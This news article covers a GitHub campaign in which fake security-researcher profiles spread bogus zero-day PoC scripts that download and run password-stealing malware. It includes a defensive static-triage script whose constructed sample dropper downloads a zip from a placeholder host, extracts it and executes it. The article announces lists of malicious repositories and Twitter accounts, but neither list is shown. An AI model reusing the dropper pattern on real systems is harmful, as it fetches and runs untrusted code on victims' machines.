Hackers are now impersonating security researchers on GitHub to spread fake zero-day proof of concept (PoC) exploits that infect Windows and Linux machines. The fake profiles claim to belong to a company named “High Sierra Cyber Security” and promote its fake PoC repositories on GitHub.
VulnCheck, which discovered the campaign, reports that it has been active since at least May 2023. The repositories advertise PoCs for zero-day vulnerabilities in popular consumer software such as Chrome, Discord, Signal, Microsoft Exchange and WhatsApp.
The profiles appear legitimate, complete with pictures of real security researchers from firms like Rapid7. They are also linked to social media accounts such as Twitter, presumably adding another layer of legitimacy to these otherwise bogus GitHub profiles.
In every case, the profiles host malicious repositories containing a Python script named poc.py, which downloads the malware onto the target system. The script starts by fetching a zip archive from an external URL chosen according to the user’s operating system: cveswindows.zip for Windows and cveslinux.zip for Linux.
Once the zip file is downloaded, the malware is stored in the OS’s temporary storage before being extracted and executed. These locations are %temp% on Windows and /home/[username]/.local/share on Linux.
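The download, stash-in-temp, extract and execute chain described above is exactly what a defender can look for before running an unfamiliar PoC. The following added example (not VulnCheck’s analysis code and not the threat actor’s poc.py) statically triages a Python script with the `ast` module; the two sample scripts it inspects are constructed for illustration and the URL in the suspect one is a placeholder.

```python
"""Static triage of a PoC script: flag a download -> temp-dir drop ->
archive extraction -> execution chain before anyone runs the script."""
import ast

# Dotted call names grouped by the behaviour they indicate.
SIGNALS = {
    "download": {"urllib.request.urlretrieve", "urllib.request.urlopen",
                 "requests.get"},
    "os_branch": {"platform.system"},
    "archive": {"zipfile.ZipFile", "ZipFile"},
    "execute": {"subprocess.Popen", "subprocess.run", "subprocess.call",
                "os.system", "os.startfile"},
}
# Path fragments matching the drop locations named in the article.
DROP_PATHS = ("%temp%", "TEMP", ".local/share")
DROPPER_CHAIN = {"download", "archive", "execute"}

def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def triage(source):
    """Return the set of behaviour labels found in a Python script."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            found |= {label for label, names in SIGNALS.items() if name in names}
        elif isinstance(node, ast.Attribute) and _dotted(node) == "sys.platform":
            found.add("os_branch")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(p in node.value for p in DROP_PATHS):
                found.add("temp_drop")
            if node.value.lower().endswith(".zip"):
                found.add("zip_payload")
    return found

def verdict(source):
    """Label the script 'dropper-like' when the full chain is present."""
    found = triage(source)
    return ("dropper-like" if DROPPER_CHAIN <= found else "no dropper chain"), found

# Constructed sample mirroring the described behaviour (not the real poc.py).
SUSPECT = '''
import os, platform, zipfile, urllib.request
name = "cveswindows.zip" if platform.system() == "Windows" else "cveslinux.zip"
dest = os.path.join(os.getenv("TEMP", os.path.expanduser("~/.local/share")), name)
urllib.request.urlretrieve("https://example.invalid/" + name, dest)
zipfile.ZipFile(dest).extractall(os.path.dirname(dest))
os.system(dest[:-4])
'''
# Constructed benign PoC: one request to a lab host, result printed.
BENIGN = '''
import requests
r = requests.get("http://127.0.0.1:8080/", params={"q": "A" * 4096})
print(r.status_code)
'''

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(label, *verdict(src))
```

A script flagged as dropper-like is not proof of malice, but it is reason to read it line by line in a disposable VM rather than run it on a workstation.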
We don’t yet know exactly what kind of malware the malicious zip files install, but VulnCheck reports that both executables install a Tor client, and that the Windows version additionally includes a password-stealing trojan. Luckily, the Windows malware is readily detected: over 60% of antivirus engines on VirusTotal flag it as suspicious. The Linux version, by contrast, is harder to detect, with only three antivirus engines picking up signs of malicious activity.
The threat actors behind the campaign are also unknown, but they appear persistent, creating new profiles and repositories every time existing ones are flagged and deleted. The real-world impact of the campaign is not yet known either.
Overall, at the time of writing, the threat actors have the following seven malicious repositories on GitHub that you shouldn’t touch with a ten-foot pole.
In addition to that, several Twitter accounts have also been created to lend more legitimacy to the fake profiles. These include: